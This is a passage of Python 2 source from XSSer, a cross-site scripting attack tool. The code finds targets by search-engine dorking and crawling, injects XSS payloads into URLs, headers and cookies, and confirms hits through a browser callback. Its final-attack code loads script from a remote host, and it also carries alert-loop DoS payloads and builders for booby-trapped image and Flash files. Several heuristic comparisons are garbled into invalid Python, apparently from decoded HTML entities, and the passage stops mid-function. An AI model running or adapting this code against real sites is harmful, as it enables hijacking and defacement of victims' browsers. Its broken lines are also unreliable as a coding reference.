self.report('='*75 + "\n")
#self.report(self.urlspoll)
self._ongoing_requests -= 1
dest_url = request.args[0]
#self.report(dest_url)
# adding constant head check number flag
if self.options.isalive:
self.flag_isalive_num = int(self.options.isalive)
if self.options.isalive <= 0:
pass
elif self.options.isalive and self.options.nohead:
self.errors_isalive = self.errors_isalive + 1
if self.errors_isalive > self.options.isalive:
pass
else:
self.report("---------------------")
self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
if self.next_isalive == True:
hc = Curl()
self.next_isalive = False
try:
urls = hc.do_head_check([url])
#self.report(url)
except:
print "Target url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
self.errors_isalive = 0
return
if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n"
print "- Your target still Alive: " + "(" + url + ")"
print "- If you are recieving continuous 404 errors requests on your injections, but your target is alive, is because:\n"
print " - your injections are failing: totally normal :-)"
print " - maybe exists some IPS/NIDS/... systems blocking your requests\n"
else:
if str(hc.info()["http-code"]) == "0":
print "\nTarget url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
else:
print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n"
print "- Your target " + "(" + url + ")" + " looks that is NOT alive"
print "- If you are recieving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target, try to; STOP THIS TEST!!\n"
self.errors_isalive = 0
else:
if str(self.errors_isalive) >= str(self.options.isalive):
self.report("---------------------")
self.report("\nAlive System: XSSer is checking if your target still alive. [Response is comming...]\n")
self.next_isalive = True
self.options.isalive = self.flag_isalive_num
else:
if self.options.isalive and not self.options.nohead:
self.report("---------------------")
self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default, to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
self.report("---------------------")
# check results an alternative url, choosing method and parameters, or not
if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
self.options.altm = "GET"
if self.options.altm == "post":
self.options.altm = "POST"
if self.options.alt == None:
pass
else:
self.report("="*45)
self.report("[+] Checking Response Options:", "\n")
self.report("[+] Url:", self.options.alt)
self.report("[-] Method:", self.options.altm)
if self.options.ald:
self.report("[-] Parameter(s):", self.options.ald, "\n")
else:
self.report("[-] Parameter(s):", query_string, "\n")
# perform normal injection
if c.info()["http-code"] in ["200", "302", "301"]:
if self.options.statistics:
self.success_connection = self.success_connection + 1
self._report_attack_success(c, dest_url, payload,
query_string, url, orig_hash)
else:
self._report_attack_failure(c, dest_url, payload,
query_string, url, orig_hash)
# checking response results
if self.options.alt == None:
pass
else:
self.report("="*45)
self.report("[+] Checking Response Results:", "\n")
self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
if 'PAYLOAD' in payload['payload']:
user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
if self.options.ald:
query_string = self.options.ald
if "VECTOR" in self.options.alt:
dest_url = self.options.alt
else:
if not dest_url.endswith("/"):
dest_url = dest_url + "/"
if self.options.altm == 'POST':
dest_url = "" + query_string + user_attack_payload
dest_url = dest_url.strip().replace("/", "", 1)
data = c.post(url, dest_url)
self._prepare_extra_attacks()
#c.post(url, dest_url)
else:
dest_url = self.options.alt + query_string + user_attack_payload
c.get(dest_url)
#if self.options.verbose:
# self.report(str(c.info()))
# self.report(str(c.body()))
# perform check response injection
if c.info()["http-code"] in ["200", "302", "301"]:
if self.options.statistics:
self.success_connection = self.success_connection + 1
self._report_attack_success(c, dest_url, payload,
query_string, url, orig_hash)
else:
self._report_attack_failure(c, dest_url, payload,
query_string, url, orig_hash)
c.close()
del c
# jumper system
#if self.options.jumper <= 0:
# pass
#elif self.options.jumper:
# if self.options.jumper == 1:
# self.report("This spell with 1 jumper requires special threading methods. Poll correctly reordered!?")
# self.errors_jumper = self.errors_jumper + 1
# if self.errors_jumper > self.options.jumper:
# pass
# else:
# self.report("---------------------")
# self.report("Jumps Checker for: " + url + " - [", self.errors_jumper, "/", self.options.jumper, "]\n")
# if self.next_jumper == True:
# try:
# del self.urlspoll[0]
# self.report("Next target: [Ready!]")
# self.next_jumper = False
# self.errors_jumper = 0
# except:
# self.report("Next target: [Not Found!]... [Finishing test]")
# self.land()
# else:
# if self.errors_jumper >= self.options.jumper:
# self.report("---------------------")
# self.report("[Jumping...]\n")
# self.next_jumper = True
# self.errors_jumper = 0
# if self.urlspoll[0] == url:
# self.land()
def encoding_permutations(self, enpayload_url):
"""
Perform encoding permutations on the url and query_string.
"""
options = self.options
if options.Cem:
enc_perm = options.Cem.split(",")
for _enc in enc_perm:
enpayload_url = self.encmap[_enc](enpayload_url)
else:
for enctype in self.encmap.keys():
if getattr(options, enctype):
enpayload_url = self.encmap[enctype](enpayload_url)
return enpayload_url
def _report_attack_success(self, curl_handle, dest_url, payload,\
query_string, orig_url, url_orig_hash):
"""
report success of an attack
"""
if not orig_url in self.successfull_urls:
self.successfull_urls.append(orig_url)
options = self.options
self.report("-"*45)
if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[-] Hashing: " + url_orig_hash)
if payload['browser'] == "[Heuristic test]":
self.report("[+] Checking: " + str(payload['payload']).strip('XSS'))
else:
self.report("[+] Trying: " + dest_url.strip())
if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
pass
else:
self.report("[+] Browser Support: " + payload['browser'])
# statistics injections counters
if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
self.check_positives = self.check_positives + 1
elif payload['browser']=="[Data Control Protocol Injection]":
self.dcp_injection = self.dcp_injection + 1
elif payload['browser']=="[Document Object Model Injection]":
self.dom_injection = self.dom_injection + 1
elif payload['browser']=="[Induced Injection]":
self.httpsr_injection = self.httpsr_injection + 1
elif payload['browser']=="[manual_injection]":
self.manual_injection = self.manual_injection + 1
else:
self.auto_injection = self.auto_injection +1
if options.verbose:
self.report("[-] Headers Results:\n")
self.report(curl_handle.info())
# if you need more data about your connection(s), uncomment this two lines:
#self.report("[-] Body Results:\n")
#self.report(curl_handle.body())
self.report("-"*45)
if payload['browser']=="[Heuristic test]":
pass
else:
self.report("[-] Injection Results:")
# check attacks success
for attack_type in self._ongoing_attacks:
#hashing = self._ongoing_attacks[attack_type]
hashing = url_orig_hash
# checking heuristic responses
if payload['browser']=="[Heuristic test]":
heuristic_param = str(payload['payload']).strip('XSS')
heuristic_string = str(hashing)
if heuristic_string in curl_handle.body():
# ascii
if heuristic_param == "\\":
self.heuris_backslash_founded = self.heuris_backslash_founded + 1
# / is the same on ASCII and Unicode
elif heuristic_param == "/":
self.heuris_slash_founded = self.heuris_slash_founded + 1
self.heuris_une_slash_founded = self.heuris_une_slash_founded + 1
elif heuristic_param == ">":
self.heuris_mayor_founded = self.heuris_mayor_founded + 1
elif heuristic_param == "<":
self.heuris_minor_founded = self.heuris_minor_founded + 1
elif heuristic_param == ";":
self.heuris_semicolon_founded = self.heuris_semicolon_founded + 1
elif heuristic_param == "'":
self.heuris_colon_founded = self.heuris_colon_founded + 1
elif heuristic_param == '"':
self.heuris_doublecolon_founded = self.heuris_doublecolon_founded + 1
elif heuristic_param == "=":
self.heuris_equal_founded = self.heuris_equal_founded + 1
# une
elif heuristic_param == "%5C":
self.heuris_une_backslash_founded = self.heuris_une_backslash_founded + 1
elif heuristic_param == "%3E":
self.heuris_une_mayor_founded = self.heuris_une_mayor_founded + 1
elif heuristic_param == "%3C":
self.heuris_une_minor_founded = self.heuris_une_minor_founded + 1
elif heuristic_param == "%3B":
self.heuris_une_semicolon_founded = self.heuris_une_semicolon_founded + 1
elif heuristic_param == "%27":
self.heuris_une_colon_founded = self.heuris_une_colon_founded + 1
elif heuristic_param == "%22":
self.heuris_une_doublecolon_founded = self.heuris_une_doublecolon_founded + 1
elif heuristic_param == "%3D":
self.heuris_une_equal_founded = self.heuris_une_equal_founded + 1
# dec
elif heuristic_param == "\":
self.heuris_dec_backslash_founded = self.heuris_dec_backslash_founded + 1
elif heuristic_param == "/":
self.heuris_dec_slash_founded = self.heuris_dec_slash_founded + 1
elif heuristic_param == ">":
self.heuris_dec_mayor_founded = self.heuris_dec_mayor_founded + 1
elif heuristic_param == "<":
self.heuris_dec_minor_founded = self.heuris_dec_minor_founded + 1
elif heuristic_param == ";":
self.heuris_dec_semicolon_founded = self.heuris_dec_semicolon_founded + 1
elif heuristic_param == "'":
self.heuris_dec_colon_founded = self.heuris_dec_colon_founded + 1
elif heuristic_param == """:
self.heuris_dec_doublecolon_founded = self.heuris_dec_doublecolon_founded + 1
elif heuristic_param == "=":
self.heuris_dec_equal_founded = self.heuris_dec_equal_founded + 1
self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
else:
if heuristic_param == "\\":
self.heuris_backslash_notfounded = self.heuris_backslash_notfounded + 1
elif heuristic_param == "/":
self.heuris_slash_notfounded = self.heuris_slash_notfounded + 1
elif heuristic_param == ">":
self.heuris_mayor_notfounded = self.heuris_mayor_notfounded + 1
elif heuristic_param == "<":
self.heuris_minor_notfounded = self.heuris_minor_notfounded + 1
elif heuristic_param == ";":
self.heuris_semicolon_notfounded = self.heuris_semicolon_notfounded + 1
elif heuristic_param == "'":
self.heuris_colon_notfounded = self.heuris_colon_notfounded + 1
elif heuristic_param == '"':
self.heuris_doublecolon_notfounded = self.heuris_doublecolon_notfounded + 1
elif heuristic_param == "=":
self.heuris_equal_notfounded = self.heuris_equal_notfounded + 1
else:
# only add a success if hashing is on body, and we have a 200 OK http code response
if hashing in curl_handle.body() and str(curl_handle.info()["http-code"]) == "200":
# some anti false positives manual checkers
if 'PAYLOAD' in payload['payload']:
user_attack_payload = payload['payload'].replace('PAYLOAD', url_orig_hash)
if str('/>' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
#self.report("FAILED: default")
#self.report(user_attack_payload)
self.add_failure(dest_url, payload, hashing, query_string, attack_type)
else:
#self.report("VULNERABLE")
self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
else:
#self.report("FAILED: not valid request")
self.add_failure(dest_url, payload, hashing, query_string, attack_type)
def add_failure(self, dest_url, payload, hashing, query_string, method='url'):
"""
Add an attack that failed to inject
"""
if payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[+] Checking: " + method + " attack with " + payload['payload'] + "... fail\n")
options = self.options
for reporter in self._reporters:
reporter.add_failure(dest_url)
if options.script:
self.hash_notfound.append((dest_url, "Manual injection", method, hashing))
else:
self.hash_notfound.append((dest_url, payload['browser'], method, hashing))
if options.verbose:
self.report("Searching hash: " + hashing + " in target source code...\n")
self.report("Injection failed!\n")
def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
"""
Add an attack that managed to inject the code
"""
if payload['browser'] == "[manual_injection]":
self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
elif payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
for reporter in self._reporters:
reporter.add_success(dest_url)
if self.options.reversecheck:
if self.options.dcp or self.options.inducedcode or self.options.dom:
pass
else:
self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
if self.options.verbose:
self.report("Searching hash: " + hashing + " in target source code...\n")
self.report("This injection is reflected by target, so can be a vulnerability!! :)\n")
self.report("Try a --reverse-check connection to validate that is 100% vulnerable\n")
def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
self.report("[-] Trying reverse connection from:", orig_url + query_string)
if "VECTOR" in orig_url:
dest_url = orig_url
else:
if not dest_url.endswith("/"):
dest_url = dest_url + "/"
dest_url = orig_url + query_string + payload['payload']
tok_url = None
self_url = "http://localhost:19084/success/" + hashing
shadow_js_inj = "document.location=document.location.hash.substring(1)"
shadow_inj = "<script>" + shadow_js_inj + "</script>"
shadow_js_inj = shadow_js_inj
dest_url = dest_url.split("#")[0]
def requote(what):
return urllib.quote_plus(what)
vector_and_payload = payload['payload']
_e = self.encoding_permutations
if 'VECTOR' in dest_url:
dest_url = dest_url.replace('VECTOR', vector_and_payload)
if '">PAYLOAD' in dest_url:
tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
tok_url += '#' + self_url
elif "'>PAYLOAD" in dest_url:
tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
tok_url += '#' + self_url
elif "javascript:PAYLOAD" in dest_url:
tok_url = dest_url.replace('javascript:PAYLOAD',
self.encoding_permutations("window.location='" + self_url+"';"))
tok_url = dest_url.replace("javascript:PAYLOAD",
_e("javascript:" + shadow_js_inj))
tok_url+= '#' + self_url
elif '"PAYLOAD"' in dest_url:
tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
elif "'PAYLOAD'" in dest_url:
tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif "SCRIPT" in dest_url:
tok_url = dest_url.replace('PAYLOAD',
shadow_js_inj)
tok_url += '#' + self_url
elif 'onerror="PAYLOAD"' in dest_url:
tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
tok_url+= '#' + self_url
elif 'onerror="javascript:PAYLOAD"' in dest_url:
tok_url = dest_url.replace('javascript:PAYLOAD',
self.encoding_permutations("window.location='" + self_url+"';"))
tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
_e('onerror="javascript:' + shadow_js_inj + '"'))
tok_url+= '#' + self_url
elif '<PAYLOAD>' in dest_url:
tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
tok_url+= '#' + self_url
elif 'PAYLOAD' in dest_url:
tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
tok_url+= '#' + self_url
elif 'href' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif 'url' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
self.final_attacks[hashing] = {'url': tok_url}
if tok_url:
self._webbrowser.open(tok_url)
else:
print("Cant apply any heuristic for final check on url: " + dest_url)
def _report_attack_failure(self, curl_handle, dest_url, payload,\
attack_vector, orig_url, url_orig_hash):
"""
report failure of an attack
"""
options = self.options
self.hash_notfound.append((dest_url, payload['browser'], "errorcode"))
self.report("-"*45)
for reporter in self._reporters:
reporter.add_failure(dest_url)
if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[-] Hashing: " + url_orig_hash)
if payload['browser'] == "[Heuristic test]":
self.report("[+] Trying: " + str(payload['payload']).strip('XSS'))
else:
self.report("[+] Trying: " + dest_url.strip())
self.report("[+] Browser Support: " + payload['browser'])
# statistics injections counters
if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
self.check_positives = self.check_positives + 1
elif payload['browser']=="[Data Control Protocol Injection]":
self.dcp_injection = self.dcp_injection + 1
elif payload['browser']=="[Document Object Model Injection]":
self.dom_injection = self.dom_injection + 1
elif payload['browser']=="[Induced Injection]":
self.httpsr_injection = self.httpsr_injection + 1
elif payload['browser']=="[manual_injection]":
self.manual_injection = self.manual_injection + 1
else:
self.auto_injection = self.auto_injection +1
if options.verbose:
self.report("[-] Headers Results:\n")
self.report(str(curl_handle.info()))
self.report("-"*45)
self.report("[-] Injection Results:")
if str(curl_handle.info()["http-code"]) == "404":
self.report("\n404 Not Found: The server has not found anything matching the Request-URI\n")
elif str(curl_handle.info()["http-code"]) == "403":
self.report("\n403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
elif str(curl_handle.info()["http-code"]) == "400":
self.report("\n400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
elif str(curl_handle.info()["http-code"]) == "401":
self.report("\n401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are correctly typed\n")
elif str(curl_handle.info()["http-code"]) == "407":
self.report("\n407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
elif str(curl_handle.info()["http-code"]) == "408":
self.report("\n408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
elif str(curl_handle.info()["http-code"]) == "500":
self.report("\n500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
elif str(curl_handle.info()["http-code"]) == "501":
self.report("\n501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
elif str(curl_handle.info()["http-code"]) == "502":
self.report("\n502 Bad Gateway: The server received an invalid response from the upstream server.\n")
elif str(curl_handle.info()["http-code"]) == "503":
self.report("\n503 Service Unavailable: The server is currently unable to handle the request due to a temporary overloading\n")
elif str(curl_handle.info()["http-code"]) == "504":
self.report("\n504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
elif str(curl_handle.info()["http-code"]) == "0":
self.report("\nXSSer is not working propertly with this injection:\n - Is something blocking our connection(s)?\n - Is target url correctly builded?: (" + orig_url + ")\n - Revise that parameters launched are correct\n")
else:
self.report("\nNot injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")")
if self.options.statistics:
if str(curl_handle.info()["http-code"]) == "404":
self.not_connection = self.not_connection + 1
elif str(curl_handle.info()["http-code"]) == "503":
self.forwarded_connection = self.forwarded_connection + 1
else:
self.other_connection = self.other_connection + 1
def check_positive(self, curl_handle, dest_url, payload, attack_vector):
"""
Perform extra check for positives
"""
body = curl_handle.body()
# should check ongoing_attacks here
# perform extra checks
pass
def create_options(self, args=None):
"""
Create the program options for OptionParser.
"""
self.optionParser = XSSerOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
def _get_attack_urls(self):
"""
Process payload options and make up the payload list for the attack.
"""
urls = []
options = self.options
p = self.optionParser
if options.imx:
self.create_fake_image(options.imx, options.script)
#sys.exit()
return []
if options.flash:
self.create_fake_flash(options.flash, options.script)
#sys.exit()
return []
if options.update:
# XXX implement XSSer autoupdater
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("\nCheck manually for latest 'stable' XSSer version:\n")
self.report("- http://sourceforge.net/projects/xsser/files/")
self.report("\nOr clone sources directly from -svn- repository:\n")
self.report("$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser\n")
#sys.exit()
return []
if options.url:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from URL] injections... looks like your target is good defined ;)")
self.report('='*75)
urls = [options.url]
elif options.readfile:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from file] injections... let me see this list ;)")
self.report('='*75)
try:
f = open(options.readfile)
urls = f.readlines()
urls = [ line.replace('\n','') for line in urls ]
f.close()
except:
import os.path
if os.path.exists(options.readfile) == True:
self.report('\nThere is some errors opening the file: ', options.readfile, "\n")
else:
self.report('\nThe file: ', options.readfile, " doesn't exist!!\n")
elif options.dork:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from Dork] injections...good luck ;)")
self.report('='*75)
dorker = Dorker(options.dork_engine)
try:
urls = dorker.dork(options.dork)
except Exception, e:
for reporter in self._reporters:
reporter.mosquito_crashed(dorker.search_url, str(e.message))
else:
for url in urls:
for reporter in self._reporters:
reporter.add_link(dorker.search_url, url)
if options.crawling:
nthreads = options.threads
self.crawled_urls = list(urls)
all_crawled = []
for url in set(urls):
self.report("Crawling", url, options.crawling,
options.crawler_width)
crawler = Crawler(self, Curl, all_crawled,
self.pool)
#max(1, int(nthreads/len(urls))))
crawler.set_reporter(self)
#if not self._landing:
# for reporter in self._reporters:
# reporter.start_crawl(url)
# add work request
#self.start_crawl(crawler, url, options)
# now wait for all results to arrive
while urls:
self.run_crawl(crawler, urls.pop(), options)
while not self._landing:
for reporter in self._reporters:
reporter.report_state('broad scanning')
try:
self.pool.poll()
except NoResultsPending:
# if urls:
# self.run_crawl(crawler, urls.pop(), options)
#else:
crawler.cancel()
break
if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
self.report("Founded enough results... calling all mosquitoes home", options.crawling)
crawler.cancel()
break
time.sleep(0.1)
self.report("Mosquitoes founded a total of: " + str(len(self.crawled_urls)) + " urls")
return self.crawled_urls
if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
return urls
def run_crawl(self, crawler, url, options):
def _cb(request, result):
pass
#self.crawled_urls += result
def _error_cb(request, error):
for reporter in self._reporters:
reporter.mosquito_crashed(url, str(error[0]))
traceback.print_tb(error[2])
def crawler_main(args):
return crawler.crawl(*args)
crawler.crawl(url, int(options.crawler_width),
int(options.crawling),options.crawler_local)
"""
self.pool.addRequest(crawler_main,
[[url, int(options.crawler_width), int(options.crawling),
options.crawler_local]],
_cb,
_error_cb)
"""
def poll_workers(self):
try:
self.pool.poll()
except NoResultsPending:
pass
def try_running(self, func, error, args=[]):
"""
Try running a function and print some error if it fails and exists with
a fatal error.
"""
try:
return func(*args)
except Exception, e:
self.report(error, "error")
#self.report(str(e.message), "")
if DEBUG:
traceback.print_exc()
#sys.exit()
def create_fake_image(self, filename, payload):
"""
Create -fake- image with code injected
"""
options = self.options
filename = options.imx
payload = options.script
image_xss_injections = ImageInjections()
image_injections = image_xss_injections.image_xss(options.imx , options.script)
return image_injections
def create_fake_flash(self, filename, payload):
"""
Create -fake- flash movie (.swf) with code injected
"""
options = self.options
filename = options.flash
payload = options.script
flash_xss_injections = FlashInjections()
flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
return flash_injections
def create_gtk_interface(self):
"""
Create GTK Interface
"""
options = self.options
from XSSer.gtkcontroller import Controller, reactor
uifile = "xsser.ui"
controller = Controller(uifile, self)
self._reporters.append(controller)
if reactor:
reactor.run()
else:
import gtk
gtk.main()
return controller
def run(self, opts=None):
"""
Run xsser.
"""
self._landing = False
for reporter in self._reporters:
reporter.start_attack()
if opts:
options = self.create_options(opts)
self.set_options(options)
if not self.mothership and not self.hub:
self.hub = HubThread(self)
self.hub.start()
options = self.options
# step 0: third party tricks
if options.imx: # create -fake- image with code injected
p = self.optionParser
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("[Image XSS auto-builder]...remember, only IE6 and below versions ;)")
self.report('='*75)
self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
self.report('='*75 + "\n")
if options.flash: # create -fake- flash movie (.swf) with code injected
p = self.optionParser
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("[Flash Attack! XSS auto-builder]...ready to be embedded ;)")
self.report('='*75)
self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
self.report('='*75 + "\n")
if options.xsser_gtk:
self.create_gtk_interface()
return
nthreads = max(1, abs(options.threads))
nworkers = len(self.pool.workers)
if nthreads != nworkers:
if nthreads < nworkers:
self.pool.dismissWorkers(nworkers-nthreads)
else:
self.pool.createWorkers(nthreads-nworkers)
for reporter in self._reporters:
reporter.report_state('scanning')
# step 1: get urls
urls = self.try_running(self._get_attack_urls, "\nInternal error getting -targets-. look at the end of this Traceback to see whats wrong")
for reporter in self._reporters:
reporter.report_state('arming')
# step 2: get payloads
payloads = self.try_running(self.get_payloads, "\nInternal error getting -payloads-")
for reporter in self._reporters:
reporter.report_state('cloaking')
if options.Dwo:
payloads = self.process_payloads_ipfuzzing(payloads)
elif options.Doo:
payloads = self.process_payloads_ipfuzzing_octal(payloads)
for reporter in self._reporters:
reporter.report_state('locking targets')
# step 3: get query string
query_string = self.try_running(self.get_query_string, "\nInternal error getting query -string-")
# step 4: print curl options if requested
if options.verbose:
Curl.print_options()
for reporter in self._reporters:
reporter.report_state('sanitize')
urls = self.sanitize_urls(urls)
for reporter in self._reporters:
reporter.report_state('attack')
# step 5: perform attack
self.try_running(self.attack, "\nInternal problems running attack: ", (urls, payloads, query_string))
for reporter in self._reporters:
reporter.report_state('reporting')
if len(self.final_attacks):
self.report("Waiting for tokens to arrive")
while self._ongoing_requests and not self._landing:
if not self.pool:
self.mothership.poll_workers()
else:
self.poll_workers()
time.sleep(0.2)
for reporter in self._reporters:
reporter.report_state('final sweep..')
print("="*75 + "\n")
if self.pool:
self.pool.dismissWorkers(len(self.pool.workers))
self.pool.joinAllDismissedWorkers()
start = time.time()
while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
time.sleep(0.2)
for reporter in self._reporters:
reporter.report_state('landing.. '+str(int(5.0 - (time.time() - start))))
if self.final_attacks:
self.report("Forcing a reverse connection XSSer will certificate that your target is 100% vulnerable\n")
for final_attack in self.final_attacks.itervalues():
if not final_attack['url'] == None:
self.report("Connecting from:", final_attack['url'] , "\n")
self.report(",".join(self.successfull_urls) , "is connecting remotely to XSSer... You have it! ;-)", "\n")
self.report("="*50 + "\n")
for reporter in self._reporters:
reporter.end_attack()
if self.mothership:
self.mothership.remove_reporter(self)
print("="*75 + "\n")
self.report("Mosquito(s) landed!\n")
else:
self.report("Mosquito(s) landed!")
self.print_results()
def sanitize_urls(self, urls):
all_urls = set()
#from urlparse import urlparse
for url in urls:
#o = urlparse(url)
if url.startswith("http://") or url.startswith("https://"):
# url sanitize info
#print o
#print "----------"
self.urlspoll.append(url)
all_urls.add(url)
else:
self.report("\nThis target: (" + url + ") is not a correct url [DISCARDED]\n")
url = None
return all_urls
def land(self, join=False):
self._landing = True
if self.hub:
self.hub.shutdown()
if join:
self.hub.join()
self.hub = None
def _prepare_extra_attacks(self):
"""
Setup extra attacks.
"""
options = self.options
if options.xsa:
hashing = self.generate_hash('xsa')
Curl.agent = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['xsa'] = hashing
self.xsa_injection = self.xsa_injection + 1
if options.xsr:
hashing = self.generate_hash('xsr')
Curl.referer = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['xsr'] = hashing
self.xsr_injection = self.xsr_injection + 1
if options.coo:
hashing = self.generate_hash('cookie')
Curl.cookie = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['cookie'] = hashing
self.coo_injection = self.coo_injection + 1
def attack(self, urls, payloads, query_string):
"""
Perform an attack on the given urls, with the provided payloads and
query_string.
"""
for url in urls:
if self.pool:
self.poll_workers()
else:
self.mothership.poll_workers()
if not self._landing:
self.attack_url(url, payloads, query_string)
def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
"""
Generate a real attack url, by using data from a successfull test run, but setting
a real attack payload using or not, special techniques.
This method also applies DOM stealth mechanisms.
"""
user_attack_payload = payload['payload']
if self.options.finalpayload:
user_attack_payload = self.options.finalpayload
elif self.options.finalremote:
user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
user_attack_payload = self.options.finalpayload
if self.options.dos:
user_attack_payload = '<script>for(;;)alert("You was DoSed!!");</script>'
if self.options.doss:
user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
if self.options.b64:
user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
if self.options.onm:
user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
if self.options.ifr:
user_attack_payload = '<iframe src="' + user_attack_payload + '"></iframe>'
do_anchor_payload = self.options.anchor
anchor_data = None
attack_hash = None
if 'PAYLOAD' in payload['payload']:
if user_attack_payload == "":
attack_hash = self.generate_hash('final')
user_attack_payload = payload['payload']
user_attack_payload = payload['payload'].replace('PAYLOAD', attack_hash)
else:
user_attack_payload = payload['payload'].replace('PAYLOAD', user_attack_payload)
if 'XSS' in user_attack_payload:
attack_hash = self.generate_hash('final')
user_attack_payload = user_attack_payload.replace('XSS', attack_hash)
if do_anchor_payload:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
dest_url = dest_url.replace('?', '#')
else:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
if attack_hash:
self.final_attacks[attack_hash] = {'url':dest_url}
return dest_url
def token_arrived(self, attack_hash):
if not self.mothership:
# only the mothership calls on token arriving.
self.final_attack_callback(attack_hash)
def final_attack_callback(self, attack_hash):
#if not self.mothership:
# for reporter in self._reporters:
# reporter.token_arrived(attack_hash)
if attack_hash in self.final_attacks:
dest_url = self.final_attacks[attack_hash]['url']
self.report('[*] Browser check:', dest_url)
for reporter in self._reporters:
reporter.add_checked(dest_url)
if self._reporter:
from twisted.internet import reactor
reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
self.final_attacks.pop(attack_hash)
def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
generate_shorturls = self.options.shorturls
if generate_shorturls:
shortener = ShortURLReservations(self.options.shorturls)
